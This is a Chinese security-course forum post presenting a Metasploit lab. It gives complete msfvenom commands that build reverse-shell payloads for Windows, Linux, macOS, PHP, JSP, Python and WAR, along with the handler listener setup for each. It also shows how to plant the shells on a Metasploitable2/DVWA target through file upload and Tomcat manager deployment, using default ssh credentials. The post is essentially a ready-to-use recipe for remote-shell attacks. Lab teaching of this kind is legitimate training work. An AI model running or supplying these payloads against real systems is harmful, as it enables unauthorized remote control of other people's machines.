metasploit 各种payload生成利用-女黑客-必火安全学院

女黑客

 找回密码
 立即注册

QQ登录

只需一步,快速开始

metasploit 各种payload生成利用

[复制链接]
发表于 2023-2-2 13:19:43 | 显示全部楼层 |阅读模式
metasploit 课堂实验

一,windows 被控端实验
生成:
  1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.26 LPORT=4444 -f exe > shell.exe
复制代码
msf 监听:
  1. #监听
  2. use exploit/multi/handler
  3. set payload  windows/meterpreter/reverse_tcp
  4. set lhost 192.168.1.26
  5. set lport 4444
  6. exploit
复制代码

二,linux下被控端实验
生成:
  1. msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.26 LPORT=4444 -f elf > shell.elf
复制代码
msf 监听:
  1. use exploit/multi/handler
  2. set payload linux/x86/meterpreter/reverse_tcp
  3. set lhost 192.168.1.26
  4. set lport 4444
  5. exploit
复制代码


三:mac 被控端实验

生成:
  1. <blockquote>msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.1.11 LPORT=4444 -f macho > shell.macho
复制代码
fakename.png
msf 监听:
  1. use exploit/multi/handler
  2. set osx/x86/shell_reverse_tcp
  3. set lhost 192.168.1.26
  4. set lport 4444
  5. exploit
复制代码
fakename.png

四:php 被控端 实验
生成:
  1. msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.21 LPORT=4444 -f raw > shell.php
复制代码
msf 监听:
  1. use exploit/multi/handler
  2. set php/meterpreter_reverse_tcp
  3. set lhost 192.168.1.26
  4. set lport 4444
  5. exploit
复制代码
在目标主机浏览shell.php,会显示旋转
fakename.png

等待一会,kali会上线
fakename.png
经过测试,有BUG,会超时。
fakename.png

暂且修改php运行时间和内存限制,在配置文件php.ini中修改
  1. max_execution_time = 3000 #最大执行时间
  2. memory_limit = 2048M  # n内存限制为多大
复制代码
经测试,还是无效,但是在控制端一直有操作则不会超时,停止操作一会就会超时。


五:JSP 被控端实验
这里使用 metasploitable2靶机作为目标实验对象
生成:
  1. msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.26 LPORT=4444 -f raw > shell.jsp
复制代码
fakename.png


把shell.jsp通过metasploitable2靶机中的dvwa的文件上传功能上传到靶机里。
dvwa: http://192.168.1.25/dvwa

登录metasploitable2靶机
  1. ssh msfadmin@192.168.1.25 #密码是msfadmin
复制代码
执行命令
  1. mv /var/www/dvwa/hackable/uploads/shell.jsp /usr/share/tomcat5.5/server/webapps/manager/shell.jsp
复制代码
msf 监听:
  1. use exploit/multi/handler
  2. set java/jsp_shell_reverse_tcp
  3. set lhost 192.168.1.26
  4. set lport 4444
  5. exploit
复制代码
fakename.png

# 然后打开浏览器 浏览 http://192.168.1.25:8180/manager/shell.jsp
上线:
fakename.png

六:Python 被控端实验
生成:
  1. msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.26 LPORT=4444 -f raw > shell.py
复制代码
fakename.png
把shell.py通过metasploitable2靶机中的dvwa的文件上传功能上传到靶机里。
dvwa: http://192.168.1.25/dvwa

登录metasploitable2靶机
  1. ssh msfadmin@192.168.1.25 #密码是msfadmin
复制代码
给shell.py 执行权限 chmod +x 目标文件
  1. sudo chmod +x  /var/www/dvwa/hackable/uploads/shell.py
复制代码
msf 监听:
  1. use exploit/multi/handler
  2. set payload cmd/unix/reverse_python
  3. set lhost 192.168.1.26
  4. set lport 4444
  5. exploit
复制代码
#目标机执行文件shell.py
  1. sudo /var/www/dvwa/hackable/uploads/shell.py
复制代码

七:war包被控端


生成被控端,使用metasploitable2 作为靶机实验
  1. msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.26 LPORT=4444 -f war > shell.war
复制代码
fakename.png

浏览靶机 http://192.168.1.25:8180/
fakename.png
登录后在页面下方部署war包
fakename.png
点击 Deploy
fakename.png
查看shell.war 包内容,使用winrar就可以查看
fakename.png
浏览器访问:http://192.168.1.25:8180/shell/usaafdfxze.jsp


有主机上线请注意
fakename.png









回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|小黑屋|女黑客 |网站地图

© Copyright 2021 版权所有(一极教育科技有限公司)

津ICP备17008032号-3
快速回复 返回顶部 返回列表